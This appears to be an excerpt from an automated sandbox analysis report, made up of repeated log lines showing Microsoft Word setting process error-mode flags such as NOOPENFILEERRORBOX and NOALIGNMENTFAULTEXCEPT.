Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
